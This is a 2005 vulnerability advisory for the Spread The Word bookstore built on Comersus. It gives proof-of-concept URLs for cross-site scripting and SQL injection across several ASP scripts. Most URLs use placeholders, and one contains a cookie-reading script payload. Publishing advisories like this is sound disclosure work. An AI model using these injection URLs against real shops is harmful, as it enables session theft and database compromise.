comersusXSSsql.txt

`##################################################################  
Spread The Word (comersus based bookstore ) multiple script and   
variables XSS and SQL Injections vulnerabilities.  
vendor url:http://www.stwm.com/opportunity.asp  
advisore url:http://lostmon.blogspot.com/2005/05/  
spread-word-multiple-xss-and-sql.html  
vendor notified:yes exploit available: yes  
##################################################################  
  
Spread The Word (comersus based bookstore ) contains a flaw that   
allows a remote cross site scripting attack.This flaw exists because  
the application does not validate multiple variables upon submission  
to multiple scripts.This could allow a user to create a specially   
crafted URL that would execute arbitrary code in a user's browser   
within the trust relationship between the browser and the server,  
leading to a loss of integrity.  
  
  
##############  
versions:  
##############  
  
I can´t established what version are affected.  
  
##############  
solution:  
##############  
  
no solution was available at this time.  
  
##############  
timeline  
##############  
  
discovered: 17 oct 2004  
vendor notify: 08 april 2005   
vendor response: 11 april 2005  
disclosure: 24 may 2005  
  
  
  
####################  
proof of concepts:  
####################  
  
Some files have different prefix like STW  
ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp'  
  
#####################  
BrowseCategories.asp  
#####################  
  
XSS,sql errors and path disclosure.  
  
  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible  
  
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible  
  
Cat0literal can be books, videos,gifts,bibles,or other categories  
similar listed in the cart.  
  
#############  
search.asp   
#############  
  
XSS,sql errors and path disclosure.  
  
  
http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala  
http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='  
  
##################  
AdvancedSearch.asp  
##################  
  
http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit  
  
  
##################  
ViewItem.asp  
##################  
  
XSS,sql errors and path disclosure.  
  
http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565  
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]  
  
http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565  
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]  
  
  
  
####################  
STWShowContent.asp  
###################  
XSS ,sql errors and path disclosure.  
  
  
http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]  
  
http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]  
http://[target]/store/STWShowContent.asp   
  
###################  
MySide.Asp  
###################  
XSS,sql errors and path disclosure.  
  
  
http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]  
http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles  
  
#################  
BrowseMain.asp  
#################  
XSS ,sql errors and path disclosure.  
  
http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>  
  
################  
others  
################  
XSS   
http://[target]/store/[email protected]&RedirectURL=[XSS-CODE]  
http://[target]/store/Login.asp?RedirectURL=[XSS-code]  
  
Also it´s posible to we can inject sql or XSS code in 'Cat0' variable or 'Cat1'  
in all files where this variables are used.  
  
Also it´s posible to we can inject XSS code in 'Cat0literal' variable  
or 'Cat1literal'  
in all files where this variables are used.  
  
######################### End ########################  
  
thnx to estrella to be my ligth  
Thnx to icaro he is my Shadow !!!  
thnx to all http://www.osvdb.org Team  
thnx to all who day after day support me !!!  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
La curiosidad es lo que hace mover la mente  
`